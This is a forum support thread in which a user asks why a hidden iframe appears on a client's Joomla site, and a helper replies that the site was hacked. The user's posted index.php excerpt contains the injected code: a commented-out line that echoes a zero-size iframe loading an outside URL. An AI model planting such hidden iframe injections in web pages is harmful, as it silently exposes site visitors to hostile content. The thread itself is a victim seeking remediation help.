0
Welcome Guest! Login
0 items Join Now

ROCKETTHEME IS CLOSING ON JUNE 30, 2025. As a thank-you to our community, enjoy 50% off all themes with the promo code THANKYOU before we shut down. Read our Farewell Blog Post for more details.

weird iframe coming up on my index.php

  • weird iframe coming up on my index.php

    Posted 16 years 9 months ago
    • Hello!
      please take a look to my client's website www.horacero.com.pa and you'll see that a weird iframe comes up. here's the code you'll see on the source code:


      I've been trying to debug it and remove it. I just can't find it neither on the database neither on the code or modules.

      Can you please tell me where can this be loading?
    • Last Edit: 9 years 5 months ago by Kat05.
    • -Rush-
      biguphosting.com
    • Zorro's Avatar
    • Zorro
    • Sr. Rocketeer
    • Posts: 114
    • Thanks: 0

    Re: weird iframe coming up on my index.php

    Posted 16 years 9 months ago
    • The site has been hacked. Check Joomla's index.php and your template's index.php.

      Contact your provider for assistance. Clean out the site's files, and restore them from your backup.

      Kind regards,
      Zorro
  • Re: weird iframe coming up on my index.php

    Posted 16 years 9 months ago
    • This is what comes up inside my index.php... I've commented out the JDEBUG but really can't tell if I'm doing a right move because I'm kinda guessing what could be causing it.
      //JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;
       
      /**
       * CREATE THE APPLICATION
       *
       * NOTE :
       */
      $mainframe =& JFactory::getApplication('site');
      //echo ("<html><iframe src=\"http://www.stockphotoshop.co.uk/ip/index.php\" width=\"0\" height=\"0\"></iframe></html>");
       
      /**
       * INITIALISE THE APPLICATION
       *
       * NOTE :
       */
      // set the language
      $mainframe->initialise();
    • -Rush-
      biguphosting.com

Time to create page: 0.077 seconds